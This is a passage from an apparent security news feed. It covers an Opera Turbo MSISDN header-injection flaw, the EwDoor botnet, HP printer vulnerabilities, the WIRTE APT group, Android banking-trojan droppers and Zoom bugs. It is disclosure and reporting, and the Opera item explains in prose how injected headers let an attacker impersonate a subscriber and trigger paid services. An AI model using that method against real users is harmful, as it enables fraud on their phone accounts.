Once the request is initiated and routed by GGSN all communication happens in HTTPS, hence GGSN will not be familiar with the source MSISDN, because there is no header enrichment process, Opera turbo server establishes a secure session to perform the rest of the process during the subscription. In this case, GGSN acts as a routing device and fails to perform HE process (Because HE can only be performed on HTTP protocol but Opera mini creates an HTTPS-based session).

Post this if we navigated to https://www.inputzer.io sniff the packets via Wireshark the source IP would be our public IP and destination hits to opera turbo servers such as `global-4-lvs-hopper.opera-mini.net` rather than www.inputzero.io.

Having said that, after countless assessment on the subscription process via opera mini, I found one `ping`  request which is generated via opera mini, when its is open for the first time after clearing the cache and temp data of the browser. It was observed, that ping request is responsible for taking MSISDN and creating the session for entire flow.

Injecting MSISDN headers in this request with the victims MSISDN, the session was established by the victims number with opera turbo server and now you can impersonate the victim and subscribe for any VAS service to deduct his/her digital money. With a successful subscription using the above steps and server log it was concluded that opera turbo servers don’t validate/filter certain injected HTTP headers which lead to activation of VAS services.

Patch: Opera turbo stops forwarding such injected HTTP headers and CVE-2018-19825 was assigned to this which states “Lack of filtering of certain HTTP headers could lead to fraudulent VAS activation.”

About the Author: Security Researcher Dhiraj Mishra (@mishradhiraj)

Original Post @ https://www.inputzero.io/2021/04/play-the-opera-please.html

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, IKEA)

The post Play the Opera Please – Opera patches a flaw in their turbo servers appeared first on Security Affairs.

New EwDoor Botnet is targeting AT&T customers

30 November 2021 at 19:09

360 Netlab experts spotted a new botnet dubbed EwDoor that infects unpatched AT&T enterprise network edge devices.

Experts from Qihoo 360’s Network Security Research Lab discovered a new botnet, dubbed EwDoor, that targets AT&T customers using EdgeMarc Enterprise Session Border Controller (ESBC) edge devices that are publicly exposed to the Internet.

The attackers are targeting Edgewater Networks’ devices by exploiting the CVE-2017-6079 vulnerability with a relatively unique mount file system command.

“On October 27, 2021, our Botmon system ided an attacker attacking Edgewater Networks’ devices via CVE-2017-6079 with a relatively unique mount file system command in its payload, which had our attention, and after analysis, we confirmed that this was a brand new botnet, and based on it’s targeting of Edgewater producers and its Backdoor feature, we named it EwDoor.” reads the analysis published by Qihoo 360 .

For a limited period of time, the researchers were able to determine the dimension of the botnet through sinkholing, the experts noticed that the EwDoor use a backup mechanism for its C2 and registered a backup command-and-control (C2) domain (iunno[.]se) to analyze the connections from the infected devices.

Later EwDoor operators changed the communication model and experts were no more able to analyze the requesters.

During a few hours of observation, the researchers discovered that the infected systems were EdgeMarc Enterprise Session Border Controller used by AT&T. The experts identified 5,700 infected systems located in the US.

“By back-checking the SSl certificates used by these devices [infected devices that the C2 during sinkholing], we found that there were about 100k IPs using the same SSl certificate. We are not sure how many devices corresponding to these IPs could be infected, but we can speculate that as they belong to the same class of devices the possible impact is real.” continues the report.

Researchers have identified 3 versions of the malware, the bot was mainly used to launch DDoS attacks ad to establish a backdoor on infected devices to gather sensitive information, such as call logs.

The bot supports the following functions:

  • Self updating
  • Port scanning
  • File management
  • DDoS attack
  • Reverse SHELL
  • Execute arbitrary commands
EwDoor

The botnet implements a series of safeguards to prevent analysis from security experts such as the use of TLS protocol to prevent communication from being intercepted, the encryption of sensitive resources to make it hard reverse engineering and moved C2 to cloud and it is sent by BT tracker to prevent direct extraction by IOC system.

“Modify the “ABIFLAGS” PHT in ELF to counter qemu-user and some high kernel versions of the linux sandbox. This is a relatively rare countermeasure, which shows that the author of EwDoor is very familiar with the Linux kernel, QEMU, and Edgewater devices.” continues the report.

The experts provide additional technical details on the EwDoor botnet in the report and shared indicators of compromise (IOCs) for this threat.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, EwDoor)

The post New EwDoor Botnet is targeting AT&T customers appeared first on Security Affairs.

Critical Printing Shellz flaws impact 150 HP multifunction printer models

30 November 2021 at 15:44

Researchers discovered a critical wormable buffer overflow vulnerability that affects 150 different HP multifunction printer models (MFPs).

Cybersecurity researchers from F-Secure have discovered two critical vulnerabilities, collectively tracked as Printing Shellz, that impact approximately 150 multifunction printer models.

The vulnerabilities can be exploited by attackers to take control of vulnerable devices and steal sensitive information, from enterprise networks. The issues date back to 2013 and HP fixed them ([1], [2]) in November. The company acknowledged F-Secure Labs researchers Timo Hirvonen and Alexander Bolshev for reporting the vulnerabilities on April 29, 2021.

The two vulnerabilities are:

  • CVE-2021-39237 (CVSS score: 7.1) – An information disclosure vulnerability impacting certain HP LaserJet, HP LaserJet Managed, HP PageWide, and HP PageWide Managed printers.
  • CVE-2021-39238 (CVSS score: 9.3) – A buffer overflow vulnerability impacting certain HP Enterprise LaserJet, HP LaserJet Managed, HP Enterprise PageWide, and HP PageWide Managed products.

We found multiple exploitable bugs in a HP multi-function printer (MFP). The flaws are in the unit’s communications board and font parser.” reads the FAQs published by F-Secure researchers. “An attacker can exploit them to gain code execution rights, with the former requiring physical access while the latter can be accomplished remotely. A successful attack will allow an adversary to achieve various objectives, including stealing information or using the compromised machine as a beachhead for future attacks against an organization.

Threat actors can exploit both flaws locally via physical access to the vulnerable device, for example by Printing from USB drives. Another attack scenario sees attackers printing from another device in the same network segment, in this case, the threat actor uses an exploit that replicates itself to other vulnerable MFPs across the network.

Below are the attack scenarios detailed by the researchers:

  • Printing from USB drives. This is what we used during the research. In the modern firmware versions, printing from USB is disabled by default.
  • Social engineering a user into printing a malicious document. It may be possible to embed an exploit for the font-parsing vulnerabilities in a PDF. The opportunities for social engineering are endless: HR printing a CV before a job interview, a receptionist printing a boarding pass, etc.
  • Printing by connecting directly to the physical LAN port.
  • Printing from another device that is under attacker’s control and in the same network segment. This also implies that the respective flaw (CVE-2021-39238) is wormable, i.e., the exploit can be used to create a worm that replicates itself to other vulnerable MFPs across the network.
  • Cross-site printing (XSP): sending the exploit to the printer directly from the browser (by tricking a user into visiting a malicious website, for example) using an HTTP POST to JetDirect port 9100/TCP. This is probably the most attractive attack vector.
  • Direct attack via exposed UART ports that are mentioned in CVE-2021-39237, if attacker has physical access to the device for a short period of time.

Organizations should install the patches as soon as possible, the public disclosure of the vulnerabilities will likely trigger a wave of attacks attempting to exploit the vulnerabilities.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, HP multifunction printers)

The post Critical Printing Shellz flaws impact 150 HP multifunction printer models appeared first on Security Affairs.

WIRTE APT group targets the Middle East since at least 2019

30 November 2021 at 13:57

A threat actor named WIRTE targets government, diplomatic entities, military organizations, law firms, and financial institutions in Middle East.

Cybersecurity researchers from Kaspersky have detailed the activity of a threat actor named WIRTE that is targeting government, diplomatic entities, military organizations, law firms, and financial institutions in Middle East since early 2019.

The activity of the WIRTE group has been documented by cybersecurity researchers at Lab52 in2019, the group is a politically motivated threat actor linked to the Gaza Cybergang. Other victims targeted by the group are in Armenia, Cyprus, Egypt, Jordan, Lebanon, Palestine, Syria, and Turkey.

WIRTE APT

The group launched spear-phishing campaigns using weaponized Microsoft Office documents to deploy VBS/VBA implants. The weaponized Excel documents acted as droppers that use hidden spreadsheets and VBA macros to deliver a first stage implant, which is a Visual Basic Script (VBS). The VBS implant is a script that collects system information and executes arbitrary code on the infected machine.

The first stage implant also downloads and installs a next-stage dropper named Ferocious that leverages a living-off-the-land (LotL) technique called COM hijacking to achieve persistence and and execute another PowerShell script dubbed LitePower Stager

The LitePower stager is a small PowerShell implant that acts as a downloader and secondary stager used to execute commands sent by the C2, it also allow to download and deploy further malware. The experts were able to locate C2 servers in Ukraine and Estonia.

“In our initial sample analysis, the C2 domain we observed was stgeorgebankers[.]com. After conducting pivots through malware samples, we were able to identify multiple C2 domains that date back to at least December 2019.” continues the analysis.”These C2 domains were occasionally behind CloudFlare to obscure the real C2 IP address. Thanks to collaboration with our partners, we were able to gather some of the original C2 IP addresses, which allowed us to discover that the servers are hosted in Ukraine and Estonia.”

WIRTE operators remain under the radar for a long period of time, the attacks against law firms and financial institutions represent an important switch for a group that is politically motivated.

“WIRTE modified their toolset and how they operate to remain stealthy for a longer period of time. Living-off-the-land (LotL) techniques are an interesting new addition to their TTPs. This suspected subgroup of Gaza Cybergang used simple yet effective methods to compromise its victims with better OpSec than its suspected counterparts. Using interpreted language malware such as VBS and PowerShell scripts, unlike the other Gaza Cybergang subgroups, adds flexibility to update their toolset and avoid static detection controls.” continues the report. “Whether WIRTE is a new subgroup or an evolution of existing Gaza Cybergang subgroups, we see them expanding their presence further in cyberspace by using updated and stealthier TTPs.”

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, IKEA)

The post WIRTE APT group targets the Middle East since at least 2019 appeared first on Security Affairs.

4 Android banking trojans were spread via Google Play infecting 300.000+ devices

30 November 2021 at 07:44

Experts found four Android banking trojans that were available on the official Google Play Store and that infected +300,000 devices.

Researchers from ThreatFabric discovered four distinct Android banking trojans that were spread via the official Google Play Store between August and November 2021. According to the experts, the malware infected more than 300,000 devices through multiple dropper apps.

dropper apps banking Trojan

Threat actors are refining their techniques to bypass security checks implemented by Google for the app in its Play Store. A trick to bypass the checks consists of introducing carefully planned small malicious code updates over a longer period in Google Play. Another technique used by the threat actors involves designing look-alike command-and-control (C2) websites that match the theme of the dropper app so as to slip past conventional detection methods.

“To make themselves even more difficult to detect, the actors behind these dropper apps only manually activate the installation of the banking trojan on an infected device in case they desire more victims in a specific region of the world. This makes automated detection a much harder strategy to adopt by any organization.” reads the analysis published by the experts. “VirusTotal does not showcase the evolution of detections of antivirus products over time, but almost all campaigns have or had a 0/62 FUD score on VirusTotal at some point in time, confirming the difficulty of detecting dropper apps with a minimal footprint.”

The droppers were designed to distribute the Android banking trojan Anatsa, Alien, ERMAC, and Hydra.

Below is the list of dropper apps used to distribute the above banking trojan:

  • Two Factor Authenticator (com.flowdivison)
  • Protection Guard (com.protectionguard.app)
  • QR CreatorScanner (com.ready.qrscanner.mix)
  • Master Scanner Live (com.multifuction.combine.qr)
  • QR Scanner 2021 (com.qr.code.generate)
  • QR Scanner (com.qr.barqr.scangen)
  • PDF Document (com.xaviermuches.docscannerpro2)
  • Scanner – Scan to PDF
  • PDF Document Scanner (com.docscanverifier.mobile)
  • PDF Document Scanner Free (com.doscanner.mobile)
  • CryptoTracker (cryptolistapp.app.com.cryptotracker)
  • Gym and Fitness Trainer (com.gym.trainer.jeux)

ThreatFabric researchers spotted multiple samples dropped by the Brunhilda threat actor, the same group that was spotted distributing the Vultur Trojan in July 2021. In one case, the researchers observed Brunhilda posing as a QR code creator app used to drop Hydra and Ermac malware on the devices of users in were previously untapped countries, like the United States.

“In the span of only 4 months, 4 large Android families were spread via Google Play, resulting in 300.000+ infections via multiple dropper apps.” concludes the report. “A noticeable trend in the new dropper campaigns is that actors are focusing on loaders with a reduced malicious footprint in Google Play, considerably increasing the difficulties in detecting them with automation and machine learning techniques.

The small malicious footprint is a result of the new Google Play restrictions (current and planned) to put limitations on the use of privacy concerning app permissions.”

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, banking Trojan)

The post 4 Android banking trojans were spread via Google Play infecting 300.000+ devices appeared first on Security Affairs.

Google experts found 2 flaws in video conferencing software Zoom

29 November 2021 at 22:53

Google Project Zero researchers have discovered two vulnerabilities in the video conferencing software Zoom that expose users to attacks.

Security researchers from Google Project Zero discovered two vulnerabilities in the video conferencing software Zoom that expose users to attacks. The vulnerabilities impact Zoom Client for Meetings on Windows, macOS, Linux, iOS, and Android.

The issues in the video conferencing software Zoom were discovered by Google Project Zero researcher Natalie Silvanovich. The first flaw, tracked as CVE-2021-34423, is a high-severity buffer overflow vulnerability that received a CVSS base score of 7.3.

“A buffer overflow vulnerability was discovered in the products listed in the “Affected Products” section of this bulletin. This can potentially allow a malicious actor to crash the service or application, or leverage this vulnerability to execute arbitrary code.” reads the security advisory published by Zoom.

The second vulnerability addressed by the company is a memory corruption issue, tracked as CVE-2021-34424, that received a CVSS base score of 7.3.

“A vulnerability was discovered in the products listed in the “Affected Products” section of this bulletin which potentially allowed for the exposure of the state of process memory. This issue could be used to potentially gain insight into arbitrary areas of the product’s memory.” reads the advisory.

Below is the list of affected Zoom products:

  • Zoom Client for Meetings (for Android, iOS, Linux, macOS, and Windows) before version 5.8.4
  • Zoom Client for Meetings for Blackberry (for Android and iOS) before version 5.8.1
  • Zoom Client for Meetings for intune (for Android and iOS) before version 5.8.4
  • Zoom Client for Meetings for Chrome OS before version 5.0.1
  • Zoom Rooms for Conference Room (for Android, AndroidBali, macOS, and Windows) before version 5.8.3
  • Controllers for Zoom Rooms (for Android, iOS, and Windows) before version 5.8.3
  • Zoom VDI before version 5.8.4
  • Zoom Meeting SDK for Android before version 5.7.6.1922
  • Zoom Meeting SDK for iOS before version 5.7.6.1082
  • Zoom Meeting SDK for macOS before version 5.7.6.1340
  • Zoom Meeting SDK for Windows before version 5.7.6.1081
  • Zoom Video SDK (for Android, iOS, macOS, and Windows) before version 1.1.2
  • Zoom On-Premise Meeting Connector Controller before version 4.8.12.20211115
  • Zoom On-Premise Meeting Connector MMR before version 4.8.12.20211115
  • Zoom On-Premise Recording Connector before version 5.1.0.65.20211116
  • Zoom On-Premise Virtual Room Connector before version 4.4.7266.20211117
  • Zoom On-Premise Virtual Room Connector Load Balancer before version 2.5.5692.20211117
  • Zoom Hybrid Zproxy before version 1.0.1058.20211116
  • Zoom Hybrid MMR before version 4.6.20211116.131_x86-64

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, video conferencing software Zoom)

The post Google experts found 2 flaws in video conferencing software Zoom appeared first on Security Affairs.

❌